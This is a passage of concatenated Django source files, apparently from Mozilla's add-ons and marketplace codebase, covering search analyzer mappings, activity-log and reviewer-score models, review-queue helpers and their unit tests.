_platforms = {'desktop': DESKTOP_PLATFORMS, 'mobile': MOBILE_PLATFORMS}
for app in applications.APPS_ALL.values():
app.platforms = _platforms[app.platforms]
########NEW FILE########
__FILENAME__ = search
# These two dicts are mapping between language codes in zamboni and language
# analyzers in elasticsearch.
#
# Each key value of ANALYZER_MAP is language analyzer supported by
# elasticsearch. See
# http://www.elasticsearch.org/guide/reference/index-modules/analysis/lang-analyzer.html
#
# Each value of ANALYZER_MAP is a list which is supported by the key analyzer.
# All values are picked from AMO_LANGUAGES in settings.py.
#
# The rows commented out are that the language is not supported by
# elasticsearch yet. We should update it when elasticsearch supports new
# analyzer for the language.
SEARCH_ANALYZER_MAP = {
# '': ['af'], # Afrikaans
'arabic': ['ar'],
'bulgarian': ['bg'],
'catalan': ['ca'],
'czech': ['cs'],
'danish': ['da'],
'german': ['de'],
'greek': ['el'],
'english': ['en-us'],
'spanish': ['es'],
'basque': ['eu'],
'persian': ['fa'],
'finnish': ['fi'],
'french': ['fr'],
# '': ['ga-ie'], # Gaelic - Ireland
# '': ['he'], # Hebrew
'hungarian': ['hu'],
'indonesian': ['id'],
'italian': ['it'],
'cjk': ['ja', 'ko'],
# '': ['mn'], # Mongolian
'dutch': ['nl'],
# Polish requires the Elasticsearch plugin:
# https://github.com/elasticsearch/elasticsearch-analysis-stempel
'polish': ['pl'],
'brazilian': ['pt-br'],
'portuguese': ['pt-pt'],
'romanian': ['ro'],
'russian': ['ru'],
# '': ['sk'], # Slovak
# '': ['sl'], # Slovenian
# '': ['sq'], # Albanian
'swedish': ['sv-se'],
# '': ['uk'], # Ukrainian
# '': ['vi'], # Vietnamese
'chinese': ['zh-cn', 'zh-tw'],
}
# This dict is an inverse mapping of ANALYZER_MAP.
SEARCH_LANGUAGE_TO_ANALYZER = {}
for analyzer, languages in SEARCH_ANALYZER_MAP.items():
for language in languages:
SEARCH_LANGUAGE_TO_ANALYZER[language] = analyzer
# List of analyzers that require a plugin. Depending on settings.ES_USE_PLUGINS
# we may disable or bypass these.
SEARCH_ANALYZER_PLUGINS = [
'polish',
]
# Which stemmer to use for each langauge.
#
# Note: We use the keys of this dict for supported stop words, also, which is
# specified as, e.g., '_english_'.
STEMMER_MAP = {
'arabic': 'arabic',
'basque': 'basque',
'brazilian': 'brazilian',
'bulgarian': 'bulgarian',
'catalan': 'catalan',
'czech': 'czech',
'danish': 'danish',
'dutch': 'dutch',
'english': 'minimal_english',
'finnish': 'light_finish', # Yes, this is misspelled in ES.
'french': 'light_french',
'german': 'light_german',
'greek': 'greek',
'hungarian': 'light_hungarian',
'indonesian': 'indonesian',
'italian': 'light_italian',
'portuguese': 'light_portuguese',
'romanian': 'romanian',
'russian': 'russian',
'spanish': 'light_spanish',
'swedish': 'light_swedish',
}
########NEW FILE########
__FILENAME__ = models
import imghdr
import json
import os.path
import string
from copy import copy
from datetime import datetime
from django.conf import settings
from django.core.urlresolvers import reverse
from django.db import models
from django.utils.safestring import mark_safe
import bleach
import commonware.log
import jinja2
from tower import ugettext as _
import amo
import amo.models
from access.models import Group
from addons.models import Addon
from mkt.webapps.models import Webapp
from reviews.models import Review
from tags.models import Tag
from users.helpers import user_link
from users.models import UserProfile
from versions.models import Version
log = commonware.log.getLogger('devhub')
class AppLog(amo.models.ModelBase):
"""
This table is for indexing the activity log by app.
"""
addon = models.ForeignKey(Webapp, db_constraint=False)
activity_log = models.ForeignKey('ActivityLog')
class Meta:
db_table = 'log_activity_app'
ordering = ('-created',)
class CommentLog(amo.models.ModelBase):
"""
This table is for indexing the activity log by comment.
"""
activity_log = models.ForeignKey('ActivityLog')
comments = models.CharField(max_length=255)
class Meta:
db_table = 'log_activity_comment'
ordering = ('-created',)
class VersionLog(amo.models.ModelBase):
"""
This table is for indexing the activity log by version.
"""
activity_log = models.ForeignKey('ActivityLog')
version = models.ForeignKey(Version)
class Meta:
db_table = 'log_activity_version'
ordering = ('-created',)
class UserLog(amo.models.ModelBase):
"""
This table is for indexing the activity log by user.
Note: This includes activity performed unto the user.
"""
activity_log = models.ForeignKey('ActivityLog')
user = models.ForeignKey(UserProfile)
class Meta:
db_table = 'log_activity_user'
ordering = ('-created',)
class GroupLog(amo.models.ModelBase):
"""
This table is for indexing the activity log by access group.
"""
activity_log = models.ForeignKey('ActivityLog')
group = models.ForeignKey(Group)
class Meta:
db_table = 'log_activity_group'
ordering = ('-created',)
class ActivityLogManager(amo.models.ManagerBase):
def for_apps(self, apps):
if isinstance(apps, Webapp):
apps = (apps,)
vals = (AppLog.objects.filter(addon__in=apps)
.values_list('activity_log', flat=True))
if vals:
return self.filter(pk__in=list(vals))
else:
return self.none()
def for_version(self, version):
vals = (VersionLog.objects.filter(version=version)
.values_list('activity_log', flat=True))
return self.filter(pk__in=list(vals))
def for_group(self, group):
return self.filter(grouplog__group=group)
def for_user(self, user):
vals = (UserLog.objects.filter(user=user)
.values_list('activity_log', flat=True))
return self.filter(pk__in=list(vals))
def for_developer(self):
return self.exclude(action__in=amo.LOG_ADMINS + amo.LOG_HIDE_DEVELOPER)
def admin_events(self):
return self.filter(action__in=amo.LOG_ADMINS)
def editor_events(self):
return self.filter(action__in=amo.LOG_EDITORS)
def review_queue(self, webapp=False):
qs = self._by_type(webapp)
return (qs.filter(action__in=amo.LOG_REVIEW_QUEUE)
.exclude(user__id=settings.TASK_USER_ID))
def total_reviews(self, webapp=False):
qs = self._by_type(webapp)
"""Return the top users, and their # of reviews."""
return (qs.values('user', 'user__display_name', 'user__username')
.filter(action__in=amo.LOG_REVIEW_QUEUE)
.exclude(user__id=settings.TASK_USER_ID)
.annotate(approval_count=models.Count('id'))
.order_by('-approval_count'))
def monthly_reviews(self, webapp=False):
"""Return the top users for the month, and their # of reviews."""
qs = self._by_type(webapp)
now = datetime.now()
created_date = datetime(now.year, now.month, 1)
return (qs.values('user', 'user__display_name', 'user__username')
.filter(created__gte=created_date,
action__in=amo.LOG_REVIEW_QUEUE)
.exclude(user__id=settings.TASK_USER_ID)
.annotate(approval_count=models.Count('id'))
.order_by('-approval_count'))
def user_position(self, values_qs, user):
try:
return next(i for (i, d) in enumerate(list(values_qs))
if d.get('user') == user.id) + 1
except StopIteration:
return None
def total_reviews_user_position(self, user, webapp=False):
return self.user_position(self.total_reviews(webapp), user)
def monthly_reviews_user_position(self, user, webapp=False):
return self.user_position(self.monthly_reviews(webapp), user)
def _by_type(self, webapp=False):
qs = super(ActivityLogManager, self).get_query_set()
return qs.extra(
tables=['log_activity_app'],
where=['log_activity_app.activity_log_id=log_activity.id'])
class SafeFormatter(string.Formatter):
"""A replacement for str.format that escapes interpolated values."""
def get_field(self, *args, **kw):
# obj is the value getting interpolated into the string.
obj, used_key = super(SafeFormatter, self).get_field(*args, **kw)
return jinja2.escape(obj), used_key
class ActivityLog(amo.models.ModelBase):
TYPES = sorted([(value.id, key) for key, value in amo.LOG.items()])
user = models.ForeignKey('users.UserProfile', null=True)
action = models.SmallIntegerField(choices=TYPES, db_index=True)
_arguments = models.TextField(blank=True, db_column='arguments')
_details = models.TextField(blank=True, db_column='details')
objects = ActivityLogManager()
formatter = SafeFormatter()
class Meta:
db_table = 'log_activity'
ordering = ('-created',)
def f(self, *args, **kw):
"""Calls SafeFormatter.format and returns a Markup string."""
# SafeFormatter escapes everything so this is safe.
return jinja2.Markup(self.formatter.format(*args, **kw))
@property
def arguments(self):
try:
# d is a structure:
# ``d = [{'addons.addon':12}, {'addons.addon':1}, ... ]``
d = json.loads(self._arguments)
except:
log.debug('unserializing data from addon_log failed: %s' % self.id)
return None
objs = []
for item in d:
# item has only one element.
model_name, pk = item.items()[0]
if model_name in ('str', 'int', 'null'):
objs.append(pk)
else:
(app_label, model_name) = model_name.split('.')
model = models.loading.get_model(app_label, model_name)
# Cope with soft deleted models.
if hasattr(model, 'with_deleted'):
objs.extend(model.with_deleted.filter(pk=pk))
else:
objs.extend(model.objects.filter(pk=pk))
return objs
@arguments.setter
def arguments(self, args=[]):
"""
Takes an object or a tuple of objects and serializes them and stores it
in the db as a json string.
"""
if args is None:
args = []
if not isinstance(args, (list, tuple)):
args = (args,)
serialize_me = []
for arg in args:
if isinstance(arg, basestring):
serialize_me.append({'str': arg})
elif isinstance(arg, (int, long)):
serialize_me.append({'int': arg})
elif isinstance(arg, tuple):
# Instead of passing an addon instance you can pass a tuple:
# (Addon, 3) for Addon with pk=3
serialize_me.append(dict(((unicode(arg[0]._meta), arg[1]),)))
else:
serialize_me.append(dict(((unicode(arg._meta), arg.pk),)))
self._arguments = json.dumps(serialize_me)
@property
def details(self):
if self._details:
return json.loads(self._details)
@details.setter
def details(self, data):
self._details = json.dumps(data)
@property
def log(self):
return amo.LOG_BY_ID[self.action]
def to_string(self, type_=None):
log_type = amo.LOG_BY_ID[self.action]
if type_ and hasattr(log_type, '%s_format' % type_):
format = getattr(log_type, '%s_format' % type_)
else:
format = log_type.format
# We need to copy arguments so we can remove elements from it
# while we loop over self.arguments.
arguments = copy(self.arguments)
addon = None
review = None
version = None
collection = None
tag = None
group = None
for arg in self.arguments:
if isinstance(arg, Addon) and not addon:
addon = self.f(u'<a href="{0}">{1}</a>',
arg.get_url_path(), arg.name)
arguments.remove(arg)
if isinstance(arg, Review) and not review:
review = self.f(u'<a href="{0}">{1}</a>',
arg.get_url_path(), _('Review'))
arguments.remove(arg)
if isinstance(arg, Version) and not version:
text = _('Version {0}')
version = self.f(text, arg.version)
arguments.remove(arg)
if isinstance(arg, Tag) and not tag:
if arg.can_reverse():
tag = self.f(u'<a href="{0}">{1}</a>',
arg.get_url_path(), arg.tag_text)
else:
tag = self.f('{0}', arg.tag_text)
if isinstance(arg, Group) and not group:
group = arg.name
arguments.remove(arg)
user = user_link(self.user)
try:
kw = dict(addon=addon, review=review, version=version,
collection=collection, tag=tag, user=user, group=group)
return self.f(format, *arguments, **kw)
except (AttributeError, KeyError, IndexError):
log.warning('%d contains garbage data' % (self.id or 0))
return 'Something magical happened.'
def __unicode__(self):
return self.to_string()
def __html__(self):
return self
# TODO: remove once we migrate to CommAtttachment (ngoke).
class ActivityLogAttachment(amo.models.ModelBase):
"""
Model for an attachment to an ActivityLog instance. Used by the Marketplace
reviewer tools, where reviewers can attach files to comments made during
the review process.
"""
activity_log = models.ForeignKey('ActivityLog')
filepath = models.CharField(max_length=255)
description = models.CharField(max_length=255, blank=True)
mimetype = models.CharField(max_length=255, blank=True)
class Meta:
db_table = 'log_activity_attachment'
ordering = ('id',)
def get_absolute_url(self):
return reverse('reviewers.apps.review.attachment', args=[self.pk])
def filename(self):
"""
Returns the attachment's file name.
"""
return os.path.basename(self.filepath)
def full_path(self):
"""
Returns the full filesystem path of the attachment.
"""
return os.path.join(settings.REVIEWER_ATTACHMENTS_PATH, self.filepath)
def display_name(self):
"""
Returns a string describing the attachment suitable for front-end
display.
"""
display = self.description if self.description else self.filename()
return mark_safe(bleach.clean(display))
def is_image(self):
"""
Returns a boolean indicating whether the attached file is an image of a
format recognizable by the stdlib imghdr module.
"""
return imghdr.what(self.full_path()) is not None
########NEW FILE########
__FILENAME__ = admin
from django.contrib import admin
from translations.helpers import truncate
from .models import CannedResponse, EventLog, ReviewerScore
class CannedResponseAdmin(admin.ModelAdmin):
def truncate_response(obj):
return truncate(obj.response, 50)
truncate_response.short_description = 'Response'
list_display = ('name', truncate_response)
list_filter = ('type',)
class EventLogAdmin(admin.ModelAdmin):
list_display = ('created', 'type', 'action', 'field', 'user',
'changed_id', 'added', 'removed', 'notes')
list_filter = ('type', 'action')
readonly_fields = list_display
date_hierarchy = 'created'
raw_id_fields = ('user',)
def has_add_permission(self, request):
return False
def has_delete_permission(self, request, obj=None):
return False
class ReviewerScoreAdmin(admin.ModelAdmin):
list_display = ('user', 'score', 'note_key', 'note', 'created')
raw_id_fields = ('user', 'addon')
fieldsets = (
(None, {
'fields': ('user', 'addon', 'score', 'note'),
}),
)
list_filter = ('note_key',)
admin.site.register(CannedResponse, CannedResponseAdmin)
admin.site.register(EventLog, EventLogAdmin)
admin.site.register(ReviewerScore, ReviewerScoreAdmin)
########NEW FILE########
__FILENAME__ = forms
import logging
from datetime import timedelta
from django import forms
from django.forms import widgets
import happyforms
from tower import ugettext as _, ugettext_lazy as _lazy
log = logging.getLogger('z.reviewers.forms')
class ReviewLogForm(happyforms.Form):
start = forms.DateField(required=False,
label=_lazy(u'View entries between'))
end = forms.DateField(required=False, label=_lazy(u'and'))
search = forms.CharField(required=False, label=_lazy(u'containing'))
def __init__(self, *args, **kw):
super(ReviewLogForm, self).__init__(*args, **kw)
# L10n: start, as in "start date"
self.fields['start'].widget.attrs = {'placeholder': _('start'),
'size': 10}
# L10n: end, as in "end date"
self.fields['end'].widget.attrs = {'size': 10, 'placeholder': _('end')}
# L10n: Description of what can be searched for
search_ph = _('add-on, editor or comment')
self.fields['search'].widget.attrs = {'placeholder': search_ph,
'size': 30}
def clean(self):
data = self.cleaned_data
# We want this to be inclusive of the end date.
if 'end' in data and data['end']:
data['end'] += timedelta(days=1)
return data
class NonValidatingChoiceField(forms.ChoiceField):
"""A ChoiceField that doesn't validate."""
def validate(self, value):
pass
class MOTDForm(happyforms.Form):
motd = forms.CharField(required=True, widget=widgets.Textarea())
########NEW FILE########
__FILENAME__ = helpers
import datetime
import math
from django.db import connection
import jinja2
from django.conf import settings
from jingo import register
from tower import ugettext as _
import amo
from addons.helpers import new_context
from editors.models import EscalationQueue, ReviewerScore
from versions.models import Version
@register.function
def file_compare(file_obj, version):
return version.files.all()[0]
@register.function
def file_review_status(addon, file):
if file.status in [amo.STATUS_DISABLED, amo.STATUS_REJECTED]:
if file.reviewed is not None:
return _(u'Rejected')
# Can't assume that if the reviewed date is missing its
# unreviewed. Especially for versions.
else:
return _(u'Rejected or Unreviewed')
return amo.STATUS_CHOICES[file.status]
@register.function
def version_status(addon, version):
return ','.join(unicode(s) for s in version.status)
@register.inclusion_tag('editors/includes/reviewers_score_bar.html')
@jinja2.contextfunction
def reviewers_score_bar(context, types=None, addon_type=None):
user = context.get('amo_user')
return new_context(dict(
request=context.get('request'),
amo=amo, settings=settings,
points=ReviewerScore.get_recent(user, addon_type=addon_type),
total=ReviewerScore.get_total(user),
**ReviewerScore.get_leaderboards(user, types=types,
addon_type=addon_type)))
def get_avg_app_waiting_time():
"""
Returns the rolling average from the past 30 days of the time taken for a
pending app to become public.
"""
cursor = connection.cursor()
cursor.execute('''
SELECT AVG(DATEDIFF(reviewed, nomination)) FROM versions
RIGHT JOIN addons ON versions.addon_id = addons.id
WHERE addontype_id = %s AND status = %s AND
reviewed >= DATE_SUB(NOW(), INTERVAL 30 DAY)
''', (amo.ADDON_WEBAPP, amo.STATUS_PUBLIC))
row = cursor.fetchone()
days = 0
if row:
try:
days = math.ceil(float(row[0]))
except TypeError:
pass
return days
@register.function
def get_position(addon):
excluded_ids = EscalationQueue.objects.values_list('addon', flat=True)
# Look at all regular versions of webapps which have pending files.
# This includes both new apps and updates to existing apps, to combine
# both the regular and updates queue in one big list (In theory, it
# should take the same time for reviewers to process an app in either
# queue). Escalated apps are excluded just like in reviewer tools.
qs = (Version.objects.filter(addon__type=amo.ADDON_WEBAPP,
addon__disabled_by_user=False,
files__status=amo.STATUS_PENDING,
deleted=False)
.exclude(addon__status__in=(amo.STATUS_DISABLED,
amo.STATUS_DELETED, amo.STATUS_NULL))
.exclude(addon__id__in=excluded_ids)
.order_by('nomination', 'created').select_related('addon')
.no_transforms().values_list('addon_id', 'nomination'))
id_ = addon.id
position = 0
nomination_date = None
for idx, (addon_id, nomination) in enumerate(qs, start=1):
if addon_id == addon.id:
position = idx
nomination_date = nomination
break
total = qs.count()
days = 1
days_in_queue = 0
if nomination_date:
# Estimated waiting time is calculated from the rolling average of
# the queue waiting time in the past 30 days but subtracting from
# it the number of days this app has already spent in the queue.
days_in_queue = (datetime.datetime.now() - nomination_date).days
days = max(get_avg_app_waiting_time() - days_in_queue, days)
return {'days': int(days), 'days_in_queue': int(days_in_queue),
'pos': position, 'total': total}
########NEW FILE########
__FILENAME__ = models
import datetime
from django.core.cache import cache
from django.db import models
from django.db.models import Sum
import commonware.log
import amo
import amo.models
from access.models import Group
from addons.models import Addon
from amo.utils import cache_ns_key
from devhub.models import ActivityLog
from translations.fields import save_signal, TranslatedField
from users.models import UserProfile
user_log = commonware.log.getLogger('z.users')
class CannedResponse(amo.models.ModelBase):
name = TranslatedField()
response = TranslatedField(short=False)
sort_group = models.CharField(max_length=255)
type = models.PositiveIntegerField(
choices=amo.CANNED_RESPONSE_CHOICES.items(), db_index=True, default=0)
class Meta:
db_table = 'cannedresponses'
def __unicode__(self):
return unicode(self.name)
models.signals.pre_save.connect(save_signal, sender=CannedResponse,
dispatch_uid='cannedresponses_translations')
class EventLog(models.Model):
type = models.CharField(max_length=60)
action = models.CharField(max_length=120)
field = models.CharField(max_length=60, blank=True)
user = models.ForeignKey(UserProfile)
changed_id = models.IntegerField()
added = models.CharField(max_length=765, blank=True)
removed = models.CharField(max_length=765, blank=True)
notes = models.TextField(blank=True)
created = models.DateTimeField(auto_now_add=True)
class Meta:
db_table = u'eventlog'
@staticmethod
def new_editors():
action = amo.LOG.GROUP_USER_ADDED
group = Group.objects.get(name='Add-on Reviewers')
items = (ActivityLog.objects.for_group(group)
.filter(action=action.id)
.order_by('-created')[:5])
return [dict(user=i.arguments[1],
created=i.created)
for i in items]
class EditorSubscription(amo.models.ModelBase):
user = models.ForeignKey(UserProfile)
addon = models.ForeignKey(Addon)
class Meta:
db_table = 'editor_subscriptions'
class ReviewerScore(amo.models.ModelBase):
user = models.ForeignKey(UserProfile, related_name='_reviewer_scores')
addon = models.ForeignKey(Addon, blank=True, null=True, related_name='+')
score = models.SmallIntegerField()
# For automated point rewards.
note_key = models.SmallIntegerField(choices=amo.REVIEWED_CHOICES.items(),
default=0)
# For manual point rewards with a note.
note = models.CharField(max_length=255)
class Meta:
db_table = 'reviewer_scores'
ordering = ('-created',)
@classmethod
def get_key(cls, key=None, invalidate=False):
namespace = 'riscore'
if not key: # Assuming we're invalidating the namespace.
cache_ns_key(namespace, invalidate)
return
else:
# Using cache_ns_key so each cache val is invalidated together.
ns_key = cache_ns_key(namespace, invalidate)
return '%s:%s' % (ns_key, key)
@classmethod
def get_event(cls, addon, status, **kwargs):
"""Return the review event type constant.
This is determined by the addon.type and the queue the addon is
currently in (which is determined from the status).
Note: We're not using addon.status because this is called after the
status has been updated by the reviewer action.
"""
queue = ''
if status in [amo.STATUS_UNREVIEWED, amo.STATUS_LITE]:
queue = 'PRELIM'
elif status in [amo.STATUS_NOMINATED, amo.STATUS_LITE_AND_NOMINATED]:
queue = 'FULL'
elif status == amo.STATUS_PUBLIC:
queue = 'UPDATE'
if (addon.type in [amo.ADDON_EXTENSION, amo.ADDON_PLUGIN,
amo.ADDON_API] and queue):
return getattr(amo, 'REVIEWED_ADDON_%s' % queue)
elif addon.type == amo.ADDON_DICT and queue:
return getattr(amo, 'REVIEWED_DICT_%s' % queue)
elif addon.type in [amo.ADDON_LPAPP, amo.ADDON_LPADDON] and queue:
return getattr(amo, 'REVIEWED_LP_%s' % queue)
elif addon.type == amo.ADDON_PERSONA:
return amo.REVIEWED_PERSONA
elif addon.type == amo.ADDON_SEARCH and queue:
return getattr(amo, 'REVIEWED_SEARCH_%s' % queue)
elif addon.type == amo.ADDON_THEME and queue:
return getattr(amo, 'REVIEWED_THEME_%s' % queue)
elif addon.type == amo.ADDON_WEBAPP:
if addon.is_packaged:
if status == amo.STATUS_PUBLIC:
return amo.REVIEWED_WEBAPP_UPDATE
else: # If it's not PUBLIC, assume it's a new submission.
return amo.REVIEWED_WEBAPP_PACKAGED
else: # It's a hosted app.
in_rereview = kwargs.pop('in_rereview', False)
if status == amo.STATUS_PUBLIC and in_rereview:
return amo.REVIEWED_WEBAPP_REREVIEW
else:
return amo.REVIEWED_WEBAPP_HOSTED
else:
return None
@classmethod
def award_points(cls, user, addon, status, **kwargs):
"""Awards points to user based on an event and the queue.
`event` is one of the `REVIEWED_` keys in constants.
`status` is one of the `STATUS_` keys in constants.
"""
event = cls.get_event(addon, status, **kwargs)
score = amo.REVIEWED_SCORES.get(event)
if score:
cls.objects.create(user=user, addon=addon, score=score,
note_key=event)
cls.get_key(invalidate=True)
user_log.info(
(u'Awarding %s points to user %s for "%s" for addon %s'
% (score, user, amo.REVIEWED_CHOICES[event], addon.id))
.encode('utf-8'))
return score
@classmethod
def award_moderation_points(cls, user, addon, review_id):
"""Awards points to user based on moderated review."""
event = amo.REVIEWED_ADDON_REVIEW
if addon.type == amo.ADDON_WEBAPP:
event = amo.REVIEWED_APP_REVIEW
score = amo.REVIEWED_SCORES.get(event)
cls.objects.create(user=user, addon=addon, score=score, note_key=event)
cls.get_key(invalidate=True)
user_log.info(
u'Awarding %s points to user %s for "%s" for review %s' % (
score, user, amo.REVIEWED_CHOICES[event], review_id))
@classmethod
def get_total(cls, user):
"""Returns total points by user."""
key = cls.get_key('get_total:%s' % user.id)
val = cache.get(key)
if val is not None:
return val
val = (ReviewerScore.objects.no_cache().filter(user=user)
.aggregate(total=Sum('score'))
.values())[0]
if val is None:
val = 0
cache.set(key, val, None)
return val
@classmethod
def get_recent(cls, user, limit=5, addon_type=None):
"""Returns most recent ReviewerScore records."""
key = cls.get_key('get_recent:%s' % user.id)
val = cache.get(key)
if val is not None:
return val
val = ReviewerScore.objects.no_cache().filter(user=user)
if addon_type is not None:
val.filter(addon__type=addon_type)
val = list(val[:limit])
cache.set(key, val, None)
return val
@classmethod
def get_breakdown(cls, user):
"""Returns points broken down by addon type."""
key = cls.get_key('get_breakdown:%s' % user.id)
val = cache.get(key)
if val is not None:
return val
sql = """
SELECT `reviewer_scores`.*,
SUM(`reviewer_scores`.`score`) AS `total`,
`addons`.`addontype_id` AS `atype`
FROM `reviewer_scores`
LEFT JOIN `addons` ON (`reviewer_scores`.`addon_id`=`addons`.`id`)
WHERE `reviewer_scores`.`user_id` = %s
GROUP BY `addons`.`addontype_id`
ORDER BY `total` DESC
"""
with amo.models.skip_cache():
val = list(ReviewerScore.objects.raw(sql, [user.id]))
cache.set(key, val, None)
return val
@classmethod
def get_breakdown_since(cls, user, since):
"""
Returns points broken down by addon type since the given datetime.
"""
key = cls.get_key('get_breakdown:%s:%s' % (user.id, since.isoformat()))
val = cache.get(key)
if val is not None:
return val
sql = """
SELECT `reviewer_scores`.*,
SUM(`reviewer_scores`.`score`) AS `total`,
`addons`.`addontype_id` AS `atype`
FROM `reviewer_scores`
LEFT JOIN `addons` ON (`reviewer_scores`.`addon_id`=`addons`.`id`)
WHERE `reviewer_scores`.`user_id` = %s AND
`reviewer_scores`.`created` >= %s
GROUP BY `addons`.`addontype_id`
ORDER BY `total` DESC
"""
with amo.models.skip_cache():
val = list(ReviewerScore.objects.raw(sql, [user.id, since]))
cache.set(key, val, 3600)
return val
@classmethod
def _leaderboard_query(cls, since=None, types=None, addon_type=None):
"""
Returns common SQL to leaderboard calls.
"""
query = (cls.objects
.values_list('user__id', 'user__display_name')
.annotate(total=Sum('score'))
.exclude(user__groups__name__in=('No Reviewer Incentives',
'Staff', 'Admins'))
.order_by('-total'))
if since is not None:
query = query.filter(created__gte=since)
if types is not None:
query = query.filter(note_key__in=types)
if addon_type is not None:
query = query.filter(addon__type=addon_type)
return query
@classmethod
def get_leaderboards(cls, user, days=7, types=None, addon_type=None):
"""Returns leaderboards with ranking for the past given days.
This will return a dict of 3 items::
{'leader_top': [...],
'leader_near: [...],
'user_rank': (int)}
If the user is not in the leaderboard, or if the user is in the top 5,
'leader_near' will be an empty list and 'leader_top' will contain 5
elements instead of the normal 3.
"""
key = cls.get_key('get_leaderboards:%s' % user.id)
val = cache.get(key)
if val is not None:
return val
week_ago = datetime.date.today() - datetime.timedelta(days=days)
leader_top = []
leader_near = []
query = cls._leaderboard_query(since=week_ago, types=types,
addon_type=addon_type)
scores = []
user_rank = 0
in_leaderboard = False
for rank, row in enumerate(query, 1):
user_id, name, total = row
scores.append({
'user_id': user_id,
'name': name,
'rank': rank,
'total': int(total),
})
if user_id == user.id:
user_rank = rank
in_leaderboard = True
if not in_leaderboard:
leader_top = scores[:5]
else:
if user_rank <= 5: # User is in top 5, show top 5.
leader_top = scores[:5]
else:
leader_top = scores[:3]
leader_near = [scores[user_rank - 2], scores[user_rank - 1]]
try:
leader_near.append(scores[user_rank])
except IndexError:
pass # User is last on the leaderboard.
val = {
'leader_top': leader_top,
'leader_near': leader_near,
'user_rank': user_rank,
}
cache.set(key, val, None)
return val
@classmethod
def all_users_by_score(cls):
"""
Returns reviewers ordered by highest total points first.
"""
query = cls._leaderboard_query()
scores = []
for row in query:
user_id, name, total = row
user_level = len(amo.REVIEWED_LEVELS) - 1
for i, level in enumerate(amo.REVIEWED_LEVELS):
if total < level['points']:
user_level = i - 1
break
# Only show level if it changes.
if user_level < 0:
level = ''
else:
level = amo.REVIEWED_LEVELS[user_level]['name']
scores.append({
'user_id': user_id,
'name': name,
'total': int(total),
'level': level,
})
prev = None
for score in reversed(scores):
if score['level'] == prev:
score['level'] = ''
else:
prev = score['level']
return scores
class EscalationQueue(amo.models.ModelBase):
addon = models.ForeignKey(Addon)
class Meta:
db_table = 'escalation_queue'
class RereviewQueue(amo.models.ModelBase):
addon = models.ForeignKey(Addon)
class Meta:
db_table = 'rereview_queue'
@classmethod
def flag(cls, addon, event, message=None):
cls.objects.get_or_create(addon=addon)
if message:
amo.log(event, addon, addon.current_version,
details={'comments': message})
else:
amo.log(event, addon, addon.current_version)
########NEW FILE########
__FILENAME__ = test_helpers
# -*- coding: utf-8 -*-
from nose.tools import eq_
import amo
import amo.tests
from addons.models import Addon
from editors import helpers
from files.models import File
from versions.models import Version
class TestCompareLink(amo.tests.TestCase):
fixtures = ['base/addon_3615', 'base/platforms']
def setUp(self):
self.addon = Addon.objects.get(pk=3615)
self.current = File.objects.get(pk=67442)
self.version = Version.objects.create(addon=self.addon)
def test_same_platform(self):
file = File.objects.create(version=self.version,
platform=self.current.platform)
eq_(file.pk, helpers.file_compare(self.current, self.version).pk)
class TestGetPosition(amo.tests.TestCase):
def setUp(self):
# Add a public, reviewed app for measure. It took 4 days for this app
# to get reviewed.
self.public_app = amo.tests.app_factory(
version_kw={'nomination': self.days_ago(7),
'reviewed': self.days_ago(3)})
# Took 8 days for another public app to get reviewed.
amo.tests.app_factory(
version_kw={'nomination': self.days_ago(10),
'reviewed': self.days_ago(2)})
# Add to the queue 2 pending apps for good measure.
amo.tests.app_factory(
status=amo.STATUS_PENDING,
file_kw={'status': amo.STATUS_PENDING},
version_kw={'nomination': self.days_ago(3)})
amo.tests.app_factory(
status=amo.STATUS_PENDING,
file_kw={'status': amo.STATUS_PENDING},
version_kw={'nomination': self.days_ago(1)})
# A deleted app that shouldn't change calculations.
amo.tests.app_factory(
status=amo.STATUS_DELETED,
file_kw={'status': amo.STATUS_PENDING},
version_kw={'nomination': self.days_ago(1)})
def test_min(self):
pending_app = amo.tests.app_factory(
status=amo.STATUS_PENDING,
file_kw={'status': amo.STATUS_PENDING},
version_kw={'nomination': self.days_ago(42)})
pos = helpers.get_position(pending_app)
eq_(pos['days'], 1)
def test_packaged_app(self):
self.public_app.update(is_packaged=True)
version = amo.tests.version_factory(
addon=self.public_app, file_kw={'status': amo.STATUS_PENDING})
self.public_app.reload()
eq_(self.public_app.latest_version, version)
self._test_position(self.public_app)
def test_pending_app(self):
pending_app = amo.tests.app_factory(
status=amo.STATUS_PENDING,
file_kw={'status': amo.STATUS_PENDING})
self._test_position(pending_app)
def _test_position(self, app):
app.latest_version.update(nomination=self.days_ago(2))
pos = helpers.get_position(app)
# We set the nomination to 2 days ago.
eq_(pos['days_in_queue'], 2)
# There are three pending apps.
eq_(pos['total'], 3)
# It took 12 days for 2 apps to get reviewed, giving us an average of
# 6 days to go from pending->public, but we've already waited 2 days.
eq_(pos['days'], 4)
# There is one pending app in front of us.
eq_(pos['pos'], 2)
########NEW FILE########
__FILENAME__ = test_models
# -*- coding: utf8 -*-
import time
from nose.tools import eq_
import amo
import amo.tests
from editors.models import RereviewQueue, ReviewerScore
from users.models import UserProfile
class TestReviewerScore(amo.tests.TestCase):
fixtures = ['base/users']
def setUp(self):
self.addon = amo.tests.addon_factory(status=amo.STATUS_NOMINATED)
self.app = amo.tests.app_factory(status=amo.STATUS_NOMINATED)
self.user = UserProfile.objects.get(email='[email protected]')
def _give_points(self, user=None, addon=None, status=None):
user = user or self.user
addon = addon or self.addon
ReviewerScore.award_points(user, addon, status or addon.status)
def check_event(self, type, status, event, **kwargs):
self.addon.type = type
eq_(ReviewerScore.get_event(self.addon, status, **kwargs), event, (
'Score event for type:%s and status:%s was not %s' % (
type, status, event)))
def test_events_addons(self):
types = {
amo.ADDON_ANY: None,
amo.ADDON_EXTENSION: 'ADDON',
amo.ADDON_THEME: 'THEME',
amo.ADDON_DICT: 'DICT',
amo.ADDON_SEARCH: 'SEARCH',
amo.ADDON_LPAPP: 'LP',
amo.ADDON_LPADDON: 'LP',
amo.ADDON_PLUGIN: 'ADDON',
amo.ADDON_API: 'ADDON',
amo.ADDON_PERSONA: 'PERSONA',
# WEBAPP is special cased below.
}
statuses = {
amo.STATUS_NULL: None,
amo.STATUS_UNREVIEWED: 'PRELIM',
amo.STATUS_PENDING: None,
amo.STATUS_NOMINATED: 'FULL',
amo.STATUS_PUBLIC: 'UPDATE',
amo.STATUS_DISABLED: None,
amo.STATUS_BETA: None,
amo.STATUS_LITE: 'PRELIM',
amo.STATUS_LITE_AND_NOMINATED: 'FULL',
amo.STATUS_PURGATORY: None,
amo.STATUS_DELETED: None,
amo.STATUS_REJECTED: None,
amo.STATUS_PUBLIC_WAITING: None,
